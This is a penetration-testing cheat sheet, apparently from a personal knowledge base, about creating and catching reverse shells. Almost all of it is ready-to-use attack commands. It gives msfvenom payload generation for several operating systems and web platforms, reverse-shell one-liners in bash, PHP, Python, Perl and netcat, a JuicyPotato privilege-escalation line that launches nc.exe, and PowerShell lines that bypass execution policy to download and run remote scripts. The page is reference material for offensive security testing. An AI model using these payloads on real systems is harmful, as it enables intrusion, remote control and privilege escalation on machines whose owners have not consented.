Malleum Knowledge Base

Shells 2

4 min read

This document provides an overview of different types of shells and how to create them using MSFVenom.

Netcat Shell Listener

The first shell discussed in this document is the netcat shell listener. It can be created using the following command:

nc -nlvp 4444

Meterpreter Shells

Meterpreter shells can be created using MSFVenom. The following commands can be used to create meterpreter shells for different operating systems:

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

Web Payloads

MSFVenom can also be used to create payloads for web applications. The following commands can be used to create payloads for PHP, ASP, JSP, and WAR:

PHP

msfvenom -p php/reverse_php LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

OR

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

To execute the PHP webpage, add <?php at the first line of the file:

cat shell.php | pbcopy && echo '<?php ' | tr -d '\\\\\\\\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

Scripting Payloads

MSFVenom can also be used to create payloads for scripting languages. The following commands can be used to create payloads for Python, Bash, and Perl:

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

Handlers

Metasploit handlers can be used to quickly set up Metasploit to receive incoming shells. Handlers should be in the following format:

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

Once the required values are completed, use the following command to execute the handler:

msfconsole -L -r

The commands mentioned in the text are used to create different types of shells and payloads using MSFVenom. Here’s a breakdown of each command:

One Liners

Bash

The following command is used for a Bash reverse shell:

bash -i >& /dev/tcp/<ip>/<port> 0>&1

Replace <ip> and <port> with the IP address and port number of the attacker’s machine.

PHP

The following command is used for a PHP reverse shell:

php -r '$sock=fsockopen("<ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'

Replace <ip> and <port> with the IP address and port number of the attacker’s machine.

Python

The following command is used for a Python reverse shell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.149",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Replace <ip> and <port> with the IP address and port number of the attacker’s machine.

NC v1

The following command is used for a Netcat reverse shell:

nc -e /bin/sh <ip> <port>

Replace <ip> and <port> with the IP address and port number of the attacker’s machine.

NC v2

The following command is also used for a Netcat reverse shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1

Perl

The following command is used for a Perl reverse shell:

perl -e 'use Socket;$i="<ip>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Replace <ip> and <port> with the IP address and port number of the attacker’s machine.

Shell Upgrade

  • Perl: perl -e 'exec "/bin/bash";' - This command will execute /bin/bash, which will replace the current shell with a new instance of the Bash shell.

  • Bash: echo os.system('/bin/bash') - This command will execute /bin/bash, which will replace the current shell with a new instance of the Bash shell.

Interactive Shells

Method 1

 
script -qc /bin/bash /dev/null;CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
 
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/bin/env

Method 2

python3 -c 'import pty;pty.spawn("/bin/bash")'
python2 -c 'import pty;pty.spawn("/bin/bash")'

SMB Shell

 
python .py share smb
 
\\192.168.119.250\share\JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c \\192.168.119.181\share\nc.exe -e cmd.exe 192.168.119.181 7777"
 
\\192.168.119.250\share\JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c \\192.168.119.250\share\nc.exe -e cmd.exe 192.168.119.250 5555" -t *
 
 
net use X: \\10.10.15.211\share

In memory

 
 
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -Command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.211:8000?GruntHTTP.exe')"
 
 
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -Command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.211:8000/mini.ps1)"

Graph View